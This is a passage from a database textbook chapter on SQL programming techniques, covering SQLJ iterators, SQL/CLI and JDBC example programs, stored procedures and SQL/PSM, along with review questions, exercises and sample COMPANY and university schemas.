tion before the first row in the result of the query. This becomes the current row for
the iterator. Subsequently, next operations are issued on the iterator object; each
next moves the iterator to the next row in the result of the query, making it the cur-
rent row. If the row exists, the operation retrieves the attribute values for that row
into the corresponding program variables. If no more rows exist, the next opera-
tion returns NULL, and can thus be used to control the looping. Notice that the
named iterator does not need an INTO clause, because the program variables corre-
sponding to the retrieved attributes are already specified when the iterator type is
declared (line 9 in Figure 8).

469

Introduction to SQL Programming Techniques

In Figure 8, the command (e.next()) in line 13 performs two functions: It gets
the next tuple in the query result and controls the while loop. Once the program is
done with processing the query result, the command e.close() (line 16) closes the
iterator.

Next, consider the same example using positional iterators as shown in Figure 9
(program segment J2B). Line 9 in Figure 9 shows how a positional iterator type
Emppos is declared. The main difference between this and the named iterator is that
there are no attribute names (corresponding to program variable names) in the
positional iterator—only attribute types. This can provide more flexibility, but
makes the processing of the query result slightly more complex. The attribute types
must still must be compatible with the attribute types in the SQL query result and in
the same order. Line 10 shows how a positional iterator object e of type Emppos is
created in the program and then associated with a query (lines 11 and 12).

The positional iterator behaves in a manner that is more similar to embedded SQL
(see Section 2.2). A FETCH INTO com-
mand is needed to get the next tuple in a query result. The first time fetch is exe-
cuted, it gets the first tuple (line 13 in Figure 9). Line 16 gets the next tuple until no
more tuples exist in the query result. To control the loop, a positional iterator func-
tion e.endFetch() is used. This function is set to a value of TRUE when the itera-
tor is initially associated with an SQL query (line 11), and is set to FALSE each time

Figure 9
Program segment J2B, a Java program segment that uses a positional
iterator to print employee information in a particular department.

//Program Segment J2B:
0) dname = readEntry(“Enter the Department Name: “) ;
1) try {
2) #sql { select Dnumber into :dnumber
3) from DEPARTMENT where Dname = :dname} ;
4) } catch (SQLException se) {
5) System.out.println(“Department does not exist: ” + dname) ;
6) Return ;
7) }
8) System.out.printline(“Employee information for Department: ” + dname) ;
9) #sql iterator Emppos(String, String, String, String, double) ;
10) Emppos e = null ;
11) #sql e = { select ssn, fname, minit, lname, salary
12) from EMPLOYEE where Dno = :dnumber} ;
13) #sql { fetch :e into :ssn, :fn, :mi, :ln, :sal} ;
14) while (!e.endFetch()) {
15) System.out.printline(ssn + ” ” + fn + ” ” + mi + ” ” + ln + ” ” + sal) ;
16) #sql { fetch :e into :ssn, :fn, :mi, :ln, :sal} ;
17) } ;
18) e.close() ;

470

Introduction to SQL Programming Techniques

a fetch command returns a valid tuple from the query result. It is set to TRUE again
when a fetch command does not find any more tuples. Line 14 shows how the loop-
ing is controlled by negation.

3 Database Programming with Function Calls:
SQL/CLI and JDBC

Embedded SQL (see Section 2) is sometimes referred to as a static database pro-
gramming approach because the query text is written within the program source
code and cannot be changed without recompiling or reprocessing the source code.
The use of function calls is a more dynamic approach for database programming
than embedded SQL. We already saw one dynamic database programming tech-
nique—dynamic SQL—in Section 2.3. The techniques discussed here provide
another approach to dynamic database programming. A library of functions, also
known as an application programming interface (API), is used to access the data-
base. Although this provides more flexibility because no preprocessor is needed, one
drawback is that syntax and other checks on SQL commands have to be done at
runtime. Another drawback is that it sometimes requires more complex program-
ming to access query results because the types and numbers of attributes in a query
result may not be known in advance.

In this section, we give an overview of two function call interfaces. We first discuss
the SQL Call Level Interface (SQL/CLI), which is part of the SQL standard. This
was developed as a follow-up to the earlier technique known as ODBC (Open
Database Connectivity). We use C as the host language in our SQL/CLI examples.
Then we give an overview of JDBC, which is the call function interface for accessing
databases from Java. Although it is commonly assumed that JDBC stands for Java
Database Connectivity, JDBC is just a registered trademark of Sun Microsystems,
not an acronym.

The main advantage of using a function call interface is that it makes it easier to
access multiple databases within the same application program, even if they are
stored under different DBMS packages. We discuss this further in Section 3.2 when
we discuss Java database programming with JDBC, although this advantage also
applies to database programming with SQL/CLI and ODBC (see Section 3.1).

3.1 Database Programming with SQL/CLI Using C
as the Host Language

Before using the function calls in SQL/CLI, it is necessary to install the appropriate
library packages on the database server. These packages are obtained from the ven-
dor of the DBMS being used. We now give an overview of how SQL/CLI can be used
in a C program.13 We will illustrate our presentation with the sample program seg-
ment CLI1 shown in Figure 10.

13Our discussion here also applies to the C++ programming language, since we do not use any of the
object-oriented features but focus on the database programming mechanism.

471

Introduction to SQL Programming Techniques

When using SQL/CLI, the SQL statements are dynamically created and passed as
string parameters in the function calls. Hence, it is necessary to keep track of the
information about host program interactions with the database in runtime data
structures because the database commands are processed at runtime. The informa-
tion is kept in four types of records, represented as structs in C data types. An
environment record is used as a container to keep track of one or more database
connections and to set environment information. A connection record keeps track
of the information needed for a particular database connection. A statement record
keeps track of the information needed for one SQL statement. A description record
keeps track of the information about tuples or parameters—for example, the num-
ber of attributes and their types in a tuple, or the number and types of parameters in
a function call. This is needed when the programmer does not know this informa-
tion about the query when writing the program. In our examples, we assume that the
programmer knows the exact query, so we do not show any description records.

Each record is accessible to the program through a C pointer variable—called a
handle to the record. The handle is returned when a record is first created. To create
a record and return its handle, the following SQL/CLI function is used:

SQLAllocHandle(, , )

Figure 10
Program segment CLI1, a C program
segment with SQL/CLI.

//Program CLI1:
0) #include sqlcli.h ;
1) void printSal() {
2) SQLHSTMT stmt1 ;
3) SQLHDBC con1 ;
4) SQLHENV env1 ;
5) SQLRETURN ret1, ret2, ret3, ret4 ;
6) ret1 = SQLAllocHandle(SQL_HANDLE_ENV, SQL_NULL_HANDLE, &env1) ;
7) if (!ret1) ret2 = SQLAllocHandle(SQL_HANDLE_DBC, env1, &con1) else exit ;
8) if (!ret2) ret3 = SQLConnect(con1, “dbs”, SQL_NTS, “js”, SQL_NTS, “xyz”,

SQL_NTS) else exit ;
9) if (!ret3) ret4 = SQLAllocHandle(SQL_HANDLE_STMT, con1, &stmt1) else exit ;
10) SQLPrepare(stmt1, “select Lname, Salary from EMPLOYEE where Ssn = ?”,

SQL_NTS) ;
11) prompt(“Enter a Social Security Number: “, ssn) ;
12) SQLBindParameter(stmt1, 1, SQL_CHAR, &ssn, 9, &fetchlen1) ;
13) ret1 = SQLExecute(stmt1) ;
14) if (!ret1) {
15) SQLBindCol(stmt1, 1, SQL_CHAR, &lname, 15, &fetchlen1) ;
16) SQLBindCol(stmt1, 2, SQL_FLOAT, &salary, 4, &fetchlen2) ;
17) ret2 = SQLFetch(stmt1) ;
18) if (!ret2) printf(ssn, lname, salary)
19) else printf(“Social Security Number does not exist: “, ssn) ;
20) }
21) }

472

Introduction to SQL Programming Techniques

In this function, the parameters are as follows:

indicates the type of record being created. The possible val-
ues for this parameter are the keywords SQL_HANDLE_ENV,
SQL_HANDLE_DBC, SQL_HANDLE_STMT, or SQL_HANDLE_DESC, for an envi-
ronment, connection, statement, or description record, respectively.

indicates the container within which the new handle is being
created. For example, for a connection record this would be the environment
within which the connection is being created, and for a statement record this
would be the connection for that statement.

is the pointer (handle) to the newly created record of type
.

When writing a C program that will include database calls through SQL/CLI, the
following are the typical steps that are taken. We illustrate the steps by referring to
the example CLI1 in Figure 10, which reads a Social Security number of an
employee and prints the employee’s last name and salary.

1. The library of functions comprising SQL/CLI must be included in the C pro-
gram. This is called sqlcli.h, and is included using line 0 in Figure 10.

2. Declare handle variables of types SQLHSTMT, SQLHDBC, SQLHENV, and
SQLHDESC for the statements, connections, environments, and descriptions
needed in the program, respectively (lines 2 to 4).14 Also declare variables of
type SQLRETURN (line 5) to hold the return codes from the SQL/CLI func-
tion calls. A return code of 0 (zero) indicates successful execution of the func-
tion call.

3. An environment record must be set up in the program using
SQLAllocHandle. The function to do this is shown in line 6. Because an
environment record is not contained in any other record, the parameter
is the NULL handle SQL_NULL_HANDLE (NULL pointer) when
creating an environment. The handle (pointer) to the newly created environ-
ment record is returned in variable env1 in line 6.

4. A connection record is set up in the program using SQLAllocHandle. In line
7, the connection record created has the handle con1 and is contained in the
environment env1. A connection is then established in con1 to a particular
server database using the SQLConnect function of SQL/CLI (line 8). In our
example, the database server name we are connecting to is dbs and the
account name and password for login are js and xyz, respectively.

5. A statement record is set up in the program using SQLAllocHandle. In line
9, the statement record created has the handle stmt1 and uses the connec-
tion con1.

6. The statement is prepared using the SQL/CLI function SQLPrepare. In line
10, this assigns the SQL statement string (the query in our example) to the

14To keep our presentation simple, we will not show description records here.

473

Introduction to SQL Programming Techniques

statement handle stmt1. The question mark (?) symbol in line 10 represents
a statement parameter, which is a value to be determined at runtime—typ-
ically by binding it to a C program variable. In general, there could be several
parameters in a statement string. They are distinguished by the order of
appearance of the question marks in the statement string (the first ? repre-
sents parameter 1, the second ? represents parameter 2, and so on). The last
parameter in SQLPrepare should give the length of the SQL statement
string in bytes, but if we enter the keyword SQL_NTS, this indicates that the
string holding the query is a NULL-terminated string so that SQL can calcu-
late the string length automatically. This use of SQL_NTS also applies to other
string parameters in the function calls in our examples.

7. Before executing the query, any parameters in the query string should be
bound to program variables using the SQL/CLI function
SQLBindParameter. In Figure 10, the parameter (indicated by ?) to the pre-
pared query referenced by stmt1 is bound to the C program variable ssn in
line 12. If there are n parameters in the SQL statement, we should have n
SQLBindParameter function calls, each with a different parameter position
(1, 2, …, n).

8. Following these preparations, we can now execute the SQL statement refer-
enced by the handle stmt1 using the function SQLExecute (line 13). Notice
that although the query will be executed in line 13, the query results have not
yet been assigned to any C program variables.

9. In order to determine where the result of the query is returned, one common
technique is the bound columns approach. Here, each column in a query
result is bound to a C program variable using the SQLBindCol function. The
columns are distinguished by their order of appearance in the SQL query. In
Figure 10 lines 15 and 16, the two columns in the query (Lname
and Salary) are bound to the C program variables lname and salary,
respectively.15

10. Finally, in order to retrieve the column values into the C program variables,
the function SQLFetch is used (line 17). This function is similar to the
FETCH command of embedded SQL. If a query result has a collection of
tuples, each SQLFetch call gets the next tuple and returns its column values
into the bound program variables. SQLFetch returns an exception
(nonzero) code if there are no more tuples in the query result.16

15An alternative technique known as unbound columns uses different SQL/CLI functions, namely
SQLGetCol or SQLGetData, to retrieve columns from the query result without previously binding them;
these are applied after the SQLFetch command in line 17.
16If unbound program variables are used, SQLFetch returns the tuple into a temporary program area.
Each subsequent SQLGetCol (or SQLGetData) returns one attribute value in order. Basically, for each
row in the query result, the program should iterate over the attribute values (columns) in that row. This is
useful if the number of columns in the query result is variable.

474

Introduction to SQL Programming Techniques

Figure 11
Program segment CLI2, a C program segment that uses SQL/CLI
for a query with a collection of tuples in its result.

//Program Segment CLI2:
0) #include sqlcli.h ;
1) void printDepartmentEmps() {
2) SQLHSTMT stmt1 ;
3) SQLHDBC con1 ;
4) SQLHENV env1 ;
5) SQLRETURN ret1, ret2, ret3, ret4 ;
6) ret1 = SQLAllocHandle(SQL_HANDLE_ENV, SQL_NULL_HANDLE, &env1) ;
7) if (!ret1) ret2 = SQLAllocHandle(SQL_HANDLE_DBC, env1, &con1) else exit ;
8) if (!ret2) ret3 = SQLConnect(con1, “dbs”, SQL_NTS, “js”, SQL_NTS, “xyz”,

SQL_NTS) else exit ;
9) if (!ret3) ret4 = SQLAllocHandle(SQL_HANDLE_STMT, con1, &stmt1) else exit ;
10) SQLPrepare(stmt1, “select Lname, Salary from EMPLOYEE where Dno = ?”,

SQL_NTS) ;
11) prompt(“Enter the Department Number: “, dno) ;
12) SQLBindParameter(stmt1, 1, SQL_INTEGER, &dno, 4, &fetchlen1) ;
13) ret1 = SQLExecute(stmt1) ;
14) if (!ret1) {
15) SQLBindCol(stmt1, 1, SQL_CHAR, &lname, 15, &fetchlen1) ;
16) SQLBindCol(stmt1, 2, SQL_FLOAT, &salary, 4, &fetchlen2) ;
17) ret2 = SQLFetch(stmt1) ;
18) while (!ret2) {
19) printf(lname, salary) ;
20) ret2 = SQLFetch(stmt1) ;
21) }
22) }
23) }

As we can see, using dynamic function calls requires a lot of preparation to set up
the SQL statements and to bind statement parameters and query results to the
appropriate program variables.

In CLI1 a single tuple is selected by the SQL query. Figure 11 shows an example of
retrieving multiple tuples. We assume that appropriate C program variables have
been declared as in Figure 1. The program segment in CLI2 reads (inputs) a depart-
ment number and then retrieves the employees who work in that department. A
loop then iterates over each employee record, one at a time, and prints the
employee’s last name and salary.

475

Introduction to SQL Programming Techniques

3.2 JDBC: SQL Function Calls for Java Programming
We now turn our attention to how SQL can be called from the Java object-oriented
programming language.17 The function libraries for this access are known as
JDBC.18 The Java programming language was designed to be platform indepen-
dent—that is, a program should be able to run on any type of computer system that
has a Java interpreter installed. Because of this portability, many RDBMS vendors
provide JDBC drivers so that it is possible to access their systems via Java programs.
A JDBC driver is basically an implementation of the function calls specified in the
JDBC application programming interface (API) for a particular vendor’s RDBMS.
Hence, a Java program with JDBC function calls can access any RDBMS that has a
JDBC driver available.

Because Java is object-oriented, its function libraries are implemented as classes.
Before being able to process JDBC function calls with Java, it is necessary to import
the JDBC class libraries, which are called java.sql.*. These can be downloaded
and installed via the Web.19

JDBC is designed to allow a single Java program to connect to several different data-
bases. These are sometimes called the data sources accessed by the Java program.
These data sources could be stored using RDBMSs from different vendors and could
reside on different machines. Hence, different data source accesses within the same
Java program may require JDBC drivers from different vendors. To achieve this flex-
ibility, a special JDBC class called the driver manager class is employed, which keeps
track of the installed drivers. A driver should be registered with the driver manager
before it is used. The operations (methods) of the driver manager class include
getDriver, registerDriver, and deregisterDriver. These can be used to add
and remove drivers dynamically. Other functions set up and close connections to
data sources, as we will see.

To load a JDBC driver explicitly, the generic Java function for loading a class can be
used. For example, to load the JDBC driver for the Oracle RDBMS, the following
command can be used:

Class.forName(“oracle.jdbc.driver.OracleDriver”)

This will register the driver with the driver manager and make it available to the
program. It is also possible to load and register the driver(s) needed in the com-
mand line that runs the program, for example, by including the following in the
command line:

-Djdbc.drivers = oracle.jdbc.driver

17This section assumes familiarity with object-oriented concepts and basic Java concepts.
18As we mentioned earlier, JDBC is a registered trademark of Sun Microsystems, although it is com-
monly thought to be an acronym for Java Database Connectivity.
19These are available from several Web sites—for example, at http://industry.java.sun.com/products/
jdbc/drivers.

476

Introduction to SQL Programming Techniques

Figure 12
Program segment JDBC1, a Java program segment with JDBC.

//Program JDBC1:
0) import java.io.* ;
1) import java.sql.*


2) class getEmpInfo {
3) public static void main (String args []) throws SQLException, IOException {
4) try { Class.forName(“oracle.jdbc.driver.OracleDriver”)
5) } catch (ClassNotFoundException x) {
6) System.out.println (“Driver could not be loaded”) ;
7) }
8) String dbacct, passwrd, ssn, lname ;
9) Double salary ;
10) dbacct = readentry(“Enter database account:”) ;
11) passwrd = readentry(“Enter password:”) ;
12) Connection conn = DriverManager.getConnection
13) (“jdbc:oracle:oci8:” + dbacct + “/” + passwrd) ;
14) String stmt1 = “select Lname, Salary from EMPLOYEE where Ssn = ?” ;
15) PreparedStatement p = conn.prepareStatement(stmt1) ;
16) ssn = readentry(“Enter a Social Security Number: “) ;
17) p.clearParameters() ;
18) p.setString(1, ssn) ;
19) ResultSet r = p.executeQuery() ;
20) while (r.next()) {
21) lname = r.getString(1) ;
22) salary = r.getDouble(2) ;
23) system.out.printline(lname + salary) ;
24) } }
25) }

The following are typical steps that are taken when writing a Java application pro-
gram with database access through JDBC function calls. We illustrate the steps by
referring to the example JDBC1 in Figure 12, which reads a Social Security number
of an employee and prints the employee’s last name and salary.

1. The JDBC library of classes must be imported into the Java program. These
classes are called java.sql.*, and can be imported using line 1 in Figure
12. Any additional Java class libraries needed by the program must also be
imported.

2. Load the JDBC driver as discussed previously (lines 4 to 7). The Java excep-
tion in line 5 occurs if the driver is not loaded successfully.

3. Create appropriate variables as needed in the Java program (lines 8 and 9).

477

Introduction to SQL Programming Techniques

4. The Connection object. A connection object is created using the
getConnection function of the DriverManager class of JDBC. In lines 12
and 13, the Connection object is created by using the function call
getConnection(urlstring), where urlstring has the form

jdbc:oracle::/

An alternative form is

getConnection(url, dbaccount, password)

Various properties can be set for a connection object, but they are mainly
related to transactional properties.

5. The Statement object. A statement object is created in the program. In
JDBC, there is a basic statement class, Statement, with two specialized sub-
classes: PreparedStatement and CallableStatement. The example in
Figure 12 illustrates how PreparedStatement objects are created and used.
The next example (Figure 13) illustrates the other type of Statement

Figure 13
Program segment JDBC2, a Java program
segment that uses JDBC for a query with a
collection of tuples in its result.

//Program Segment JDBC2:
0) import java.io.* ;
1) import java.sql.*


2) class printDepartmentEmps {
3) public static void main (String args [])

throws SQLException, IOException {
4) try { Class.forName(“oracle.jdbc.driver.OracleDriver”)
5) } catch (ClassNotFoundException x) {
6) System.out.println (“Driver could not be loaded”) ;
7) }
8) String dbacct, passwrd, lname ;
9) Double salary ;
10) Integer dno ;
11) dbacct = readentry(“Enter database account:”) ;
12) passwrd = readentry(“Enter password:”) ;
13) Connection conn = DriverManager.getConnection
14) (“jdbc:oracle:oci8:” + dbacct + “/” + passwrd) ;
15) dno = readentry(“Enter a Department Number: “) ;
16) String q = “select Lname, Salary from EMPLOYEE where Dno = ” +

dno.tostring() ;
17) Statement s = conn.createStatement() ;
18) ResultSet r = s.executeQuery(q) ;
19) while (r.next()) {
20) lname = r.getString(1) ;
21) salary = r.getDouble(2) ;
22) system.out.printline(lname + salary) ;
23) } }
24) }

478

Introduction to SQL Programming Techniques

objects. In line 14 in Figure 12, a query string with a single parameter—indi-
cated by the ? symbol—is created in the string variable stmt1. In line 15, an
object p of type PreparedStatement is created based on the query string in
stmt1 and using the connection object conn. In general, the programmer
should use PreparedStatement objects if a query is to be executed multiple
times, since it would be prepared, checked, and compiled only once, thus sav-
ing this cost for the additional executions of the query.

6. Setting the statement parameters. The question mark (?) symbol in line 14
represents a statement parameter, which is a value to be determined at run-
time, typically by binding it to a Java program variable. In general, there
could be several parameters, distinguished by the order of appearance of the
question marks within the statement string (first ? represents parameter 1,
second ? represents parameter 2, and so on), as we discussed previously.

7. Before executing a PreparedStatement query, any parameters should be
bound to program variables. Depending on the type of the parameter, differ-
ent functions such as setString, setInteger, setDouble, and so on are
applied to the PreparedStatement object to set its parameters. The appro-
priate function should be used to correspond to the data type of the param-
eter being set. In Figure 12, the parameter (indicated by ?) in object p is
bound to the Java program variable ssn in line 18. The function setString
is used because ssn is a string variable. If there are n parameters in the SQL
statement, we should have n set… functions, each with a different param-
eter position (1, 2, …, n). Generally, it is advisable to clear all parameters
before setting any new values (line 17).

8. Following these preparations, we can now execute the SQL statement refer-
enced by the object p using the function executeQuery (line 19). There is a
generic function execute in JDBC, plus two specialized functions:
executeUpdate and executeQuery. executeUpdate is used for SQL
insert, delete, or update statements, and returns an integer value indicating
the number of tuples that were affected. executeQuery is used for SQL
retrieval statements, and returns an object of type ResultSet, which we dis-
cuss next.

9. The ResultSet object. In line 19, the result of the query is returned in an
object r of type ResultSet. This resembles a two-dimensional array or a
table, where the tuples are the rows and the attributes returned are the
columns. A ResultSet object is similar to a cursor in embedded SQL and
an iterator in SQLJ. In our example, when the query is executed, r refers to a
tuple before the first tuple in the query result. The r.next() function (line
20) moves to the next tuple (row) in the ResultSet object and returns NULL
if there are no more objects. This is used to control the looping. The pro-
grammer can refer to the attributes in the current tuple using various
get… functions that depend on the type of each attribute (for example,
getString, getInteger, getDouble, and so on). The programmer can
either use the attribute positions (1, 2) or the actual attribute names

479

Introduction to SQL Programming Techniques

(“Lname”, “Salary”) with the get… functions. In our examples, we used
the positional notation in lines 21 and 22.

In general, the programmer can check for SQL exceptions after each JDBC function
call. We did not do this to simplify the examples.

Notice that JDBC does not distinguish between queries that return single tuples and
those that return multiple tuples, unlike some of the other techniques. This is justi-
fiable because a single tuple result set is just a special case.

In example JDBC1, a single tuple is selected by the SQL query, so the loop in lines 20
to 24 is executed at most once. The example shown in Figure 13 illustrates the
retrieval of multiple tuples. The program segment in JDBC2 reads (inputs) a
department number and then retrieves the employees who work in that depart-
ment. A loop then iterates over each employee record, one at a time, and prints the
employee’s last name and salary. This example also illustrates how we can execute a
query directly, without having to prepare it as in the previous example. This tech-
nique is preferred for queries that will be executed only once, since it is simpler to
program. In line 17 of Figure 13, the programmer creates a Statement object
(instead of PreparedStatement, as in the previous example) without associating it
with a particular query string. The query string q is passed to the statement object s
when it is executed in line 18.

This concludes our brief introduction to JDBC. The interested reader is referred to
the Web site http://java.sun.com/docs/books/tutorial/jdbc/, which contains many
further details about JDBC.

4 Database Stored Procedures
and SQL/PSM

This section introduces two additional topics related to database programming. In
Section 4.1, we discuss the concept of stored procedures, which are program mod-
ules that are stored by the DBMS at the database server. Then in Section 4.2 we dis-
cuss the extensions to SQL that are specified in the standard to include
general-purpose programming constructs in SQL. These extensions are known as
SQL/PSM (SQL/Persistent Stored Modules) and can be used to write stored proce-
dures. SQL/PSM also serves as an example of a database programming language
that extends a database model and language—namely, SQL—with some program-
ming constructs, such as conditional statements and loops.

4.1 Database Stored Procedures and Functions
In our presentation of database programming techniques so far, there was an
implicit assumption that the database application program was running on a client
machine, or more likely at the application server computer in the middle-tier of a
three-tier client-server architecture. In either case, the machine where the program
is executing is different from the machine on which the database server—and the

480

Introduction to SQL Programming Techniques

main part of the DBMS software package—is located. Although this is suitable for
many applications, it is sometimes useful to create database program modules—
procedures or functions—that are stored and executed by the DBMS at the database
server. These are historically known as database stored procedures, although they
can be functions or procedures. The term used in the SQL standard for stored pro-
cedures is persistent stored modules because these programs are stored persistently
by the DBMS, similarly to the persistent data stored by the DBMS.

Stored procedures are useful in the following circumstances:

■ If a database program is needed by several applications, it can be stored at
the server and invoked by any of the application programs. This reduces
duplication of effort and improves software modularity.

■ Executing a program at the server can reduce data transfer and communica-
tion cost between the client and server in certain situations.

■ These procedures can enhance the modeling power provided by views by
allowing more complex types of derived data to be made available to the
database users. Additionally, they can be used to check for complex con-
straints that are beyond the specification power of assertions and triggers.

In general, many commercial DBMSs allow stored procedures and functions to be
written in a general-purpose programming language. Alternatively, a stored proce-
dure can be made of simple SQL commands such as retrievals and updates. The
general form of declaring stored procedures is as follows:

CREATE PROCEDURE ()
;

The parameters and local declarations are optional, and are specified only if needed.
For declaring a function, a return type is necessary, so the declaration form is

CREATE FUNCTION ()
RETURNS

;

If the procedure (or function) is written in a general-purpose programming lan-
guage, it is typical to specify the language as well as a file name where the program
code is stored. For example, the following format can be used:

CREATE PROCEDURE ()
LANGUAGE EXTERNAL NAME ;

In general, each parameter should have a parameter type that is one of the SQL data
types. Each parameter should also have a parameter mode, which is one of IN, OUT,
or INOUT. These correspond to parameters whose values are input only, output
(returned) only, or both input and output, respectively.

481

Introduction to SQL Programming Techniques

Because the procedures and functions are stored persistently by the DBMS, it
should be possible to call them from the various SQL interfaces and programming
techniques. The CALL statement in the SQL standard can be used to invoke a stored
procedure—either from an interactive interface or from embedded SQL or SQLJ.
The format of the statement is as follows:

CALL () ;

If this statement is called from JDBC, it should be assigned to a statement object of
type CallableStatement (see Section 3.2).

4.2 SQL/PSM: Extending SQL for Specifying Persistent Stored
Modules

SQL/PSM is the part of the SQL standard that specifies how to write persistent
stored modules. It includes the statements to create functions and procedures that
we described in the previous section. It also includes additional programming con-
structs to enhance the power of SQL for the purpose of writing the code (or body)
of stored procedures and functions.

In this section, we discuss the SQL/PSM constructs for conditional (branching)
statements and for looping statements. These will give a flavor of the type of con-
structs that SQL/PSM has incorporated;20 then we give an example to illustrate how
these constructs can be used.

The conditional branching statement in SQL/PSM has the following form:

IF THEN
ELSEIF THEN

ELSEIF THEN
ELSE

END IF ;

Consider the example in Figure 14, which illustrates how the conditional branch
structure can be used in an SQL/PSM function. The function returns a string value
(line 1) describing the size of a department within a company based on the number
of employees. There is one IN integer parameter, deptno, which gives a department
number. A local variable NoOfEmps is declared in line 2. The query in lines 3 and 4
returns the number of employees in the department, and the conditional branch in
lines 5 to 8 then returns one of the values {‘HUGE’, ‘LARGE’, ‘MEDIUM’, ‘SMALL’}
based on the number of employees.

SQL/PSM has several constructs for looping. There are standard while and repeat
looping structures, which have the following forms:

20We only give a brief introduction to SQL/PSM here. There are many other features in the SQL/PSM
standard.

482

Introduction to SQL Programming Techniques

Figure 14
Declaring a function in
SQL/PSM.

//Function PSM1:
0) CREATE FUNCTION Dept_size(IN deptno INTEGER)
1) RETURNS VARCHAR [7]
2) DECLARE No_of_emps INTEGER ;
3) SELECT COUNT(*) INTO No_of_emps
4) FROM EMPLOYEE WHERE Dno = deptno ;
5) IF No_of_emps > 100 THEN RETURN “HUGE”
6) ELSEIF No_of_emps > 25 THEN RETURN “LARGE”
7) ELSEIF No_of_emps > 10 THEN RETURN “MEDIUM”
8) ELSE RETURN “SMALL”
9) END IF ;

WHILE DO

END WHILE ;
REPEAT


UNTIL
END REPEAT ;

There is also a cursor-based looping structure. The statement list in such a loop is
executed once for each tuple in the query result. This has the following form:

FOR AS CURSOR FOR DO

END FOR ;

Loops can have names, and there is a LEAVE statement to break a loop
when a condition is satisfied. SQL/PSM has many other features, but they are out-
side the scope of our presentation.

5 Comparing the Three Approaches
In this section, we briefly compare the three approaches for database programming
and discuss the advantages and disadvantages of each approach.

1. Embedded SQL Approach. The main advantage of this approach is that the
query text is part of the program source code itself, and hence can be
checked for syntax errors and validated against the database schema at com-
pile time. This also makes the program quite readable, as the queries are
readily visible in the source code. The main disadvantages are the loss of flex-
ibility in changing the query at runtime, and the fact that all changes to
queries must go through the whole recompilation process. In addition,
because the queries are known beforehand, the choice of program variables
to hold the query results is a simple task, and so the programming of the
application is generally easier. However, for complex applications where

483

Introduction to SQL Programming Techniques

queries have to be generated at runtime, the function call approach will be
more suitable.

2. Library of Function Calls Approach. This approach provides more flexibil-
ity in that queries can be generated at runtime if needed. However, this leads
to more complex programming, as program variables that match the
columns in the query result may not be known in advance. Because queries
are passed as statement strings within the function calls, no checking can be
done at compile time. All syntax checking and query validation has to be
done at runtime, and the programmer must check and account for possible
additional runtime errors within the program code.

3. Database Programming Language Approach. This approach does not suf-
fer from the impedance mismatch problem, as the programming language
data types are the same as the database data types. However, programmers
must learn a new programming language rather than use a language they are
already familiar with. In addition, some database programming languages
are vendor-specific, whereas general-purpose programming languages can
easily work with systems from multiple vendors.

6 Summary
In this chapter we presented additional features of the SQL database language. In
particular, we presented an overview of the most important techniques for database
programming in Section 1. Then we discussed the various approaches to database
application programming in Sections 2 to 4.

In Section 2, we discussed the general technique known as embedded SQL, where
the queries are part of the program source code. A precompiler is typically used to
extract SQL commands from the program for processing by the DBMS, and replac-
ing them with function calls to the DBMS compiled code. We presented an overview
of embedded SQL, using the C programming language as host language in our
examples. We also discussed the SQLJ technique for embedding SQL in Java pro-
grams. The concepts of cursor (for embedded SQL) and iterator (for SQLJ) were
presented and illustrated by examples to show how they are used for looping over
the tuples in a query result, and extracting the attribute value into program vari-
ables for further processing.

In Section 3, we discussed how function call libraries can be used to access SQL
databases. This technique is more dynamic than embedding SQL, but requires more
complex programming because the attribute types and number in a query result
may be determined at runtime. An overview of the SQL/CLI standard was pre-
sented, with examples using C as the host language. We discussed some of the func-
tions in the SQL/CLI library, how queries are passed as strings, how query
parameters are assigned at runtime, and how results are returned to program vari-
ables. We then gave an overview of the JDBC class library, which is used with Java,
and discussed some of its classes and operations. In particular, the ResultSet class
is used to create objects that hold the query results, which can then be iterated over

484

Introduction to SQL Programming Techniques

by the next() operation. The get and set functions for retrieving attribute values
and setting parameter values were also discussed.

In Section 4 we gave a brief overview of stored procedures, and discussed SQL/PSM
as an example of a database programming language. Finally, we briefly compared
the three approaches in Section 5. It is important to note that we chose to give a
comparative overview of the three main approaches to database programming,
since studying a particular approach in depth is a topic that is worthy of its own
textbook.

Review Questions
1. What is ODBC? How is it related to SQL/CLI?

2. What is JDBC? Is it an example of embedded SQL or of using function calls?

3. List the three main approaches to database programming. What are the
advantages and disadvantages of each approach?

4. What is the impedance mismatch problem? Which of the three program-
ming approaches minimizes this problem?

5. Describe the concept of a cursor and how it is used in embedded SQL.

6. What is SQLJ used for? Describe the two types of iterators available in SQLJ.

Exercises
7. Consider the database shown in Figure A.2, whose schema is shown in

Figure A.3. Write a program segment to read a student’s name and print his
or her grade point average, assuming that A=4, B=3, C=2, and D=1 points.
Use embedded SQL with C as the host language.

8. Repeat Exercise 7, but use SQLJ with Java as the host language.

9. Consider the library relational database schema in Figure A.4. Write a pro-
gram segment that retrieves the list of books that became overdue yesterday
and that prints the book title and borrower name for each. Use embedded
SQL with C as the host language.

10. Repeat Exercise 9, but use SQLJ with Java as the host language.

11. Repeat Exercises 7 and 9, but use SQL/CLI with C as the host language.

12. Repeat Exercises 7 and 9, but use JDBC with Java as the host language.

13. Repeat Exercise 7, but write a function in SQL/PSM.

14. Create a function in PSM that computes the median salary for the
EMPLOYEE table shown in Figure A.1.

485

Introduction to SQL Programming Techniques

Selected Bibliography
There are many books that describe various aspects of SQL database programming.
For example, Sunderraman (2007) describes programming on the Oracle 10g
DBMS and Reese (1997) focuses on JDBC and Java programming. Many Web
resources are also available.

DEPARTMENT

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

EMPLOYEE

DEPT_LOCATIONS

Dnumber Dlocation

PROJECT

Pname Pnumber Plocation Dnum

WORKS_ON

Essn Pno Hours

DEPENDENT

Essn Dependent_name Sex Bdate Relationship

Dname Dnumber Mgr_ssn Mgr_start_date

Figure A.1
Schema diagram for the
COMPANY relational
database schema.

486

Introduction to SQL Programming Techniques

Name Student_number Class Major

Smith 17 1 CS

Brown 8 2 CS

STUDENT

Course_name Course_number Credit_hours Department

Intro to Computer Science CS1310 4 CS

Data Structures CS3320 4 CS

Discrete Mathematics MATH2410 3 MATH

Database CS3380 3 CS

COURSE

Section_identifier Course_number Semester Year Instructor

85 MATH2410 Fall 07 King

92 CS1310 Fall 07 Anderson

102 CS3320 Spring 08 Knuth

112 MATH2410 Fall 08 Chang

119 CS1310 Fall 08 Anderson

135 CS3380 Fall 08 Stone

SECTION

Student_number Section_identifier Grade

17 112 B

17 119 C

8 85 A

8 92 A

8 102 B

8 135 A

GRADE_REPORT

Course_number Prerequisite_number

CS3380 CS3320

CS3380 MATH2410

CS3320 CS1310

PREREQUISITE

Figure A.2
A database that stores
student and course
information.
